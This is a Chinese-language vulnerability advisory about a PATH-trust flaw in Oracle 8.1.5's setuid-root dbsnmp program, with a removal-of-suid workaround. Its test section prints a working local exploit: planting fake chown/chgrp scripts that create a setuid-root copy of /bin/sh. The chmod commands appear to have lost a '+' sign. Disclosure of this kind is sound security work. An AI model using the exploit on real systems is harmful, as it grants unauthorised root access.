oracle‘dbsnmp’PATH变量信任漏洞

发布日期：2001-08-01
更新日期：2001-08-03

受影响系统：

Oracle 8.1.5

描述：

---

Oracle 8.1.5所带的'dbsnmp'程序缺省设置了setuid root属性。这个程序在执行时会调用
系统命令'chown'和'chgrp'，然而它没有指定这两个程序的绝对路径，而是相信PATH变量
的内容。因此攻击者可以通过修改PATH变量内容来使dbsnmp执行用户伪造的'chown'或'chgrp'
命令。

攻击者可以获取root权限。

<*来源：Ismael Briones Vilar (ismael@el-mundo.net) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ismael Briones Vilar (ismael@el-mundo.net)提供了如下测试代码：

export PATH=~/bin/:$PATH

然后创建~/bin/chown或者~/bin/chgrp，内容如下：

#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

然后为其设置可执行属性：

chmod x ~/bin/chown
chmod x ~/bin/chgrp

执行dbsnmp之后，/tmp/XXX程序就是一个setuid root属性的shell了


建议：

---

临时解决方法：

去掉'dbsnmp'的suid属性：
# chmod a-s <oracle所在目录>/bin/dbsnmp

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.oracle.com/

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有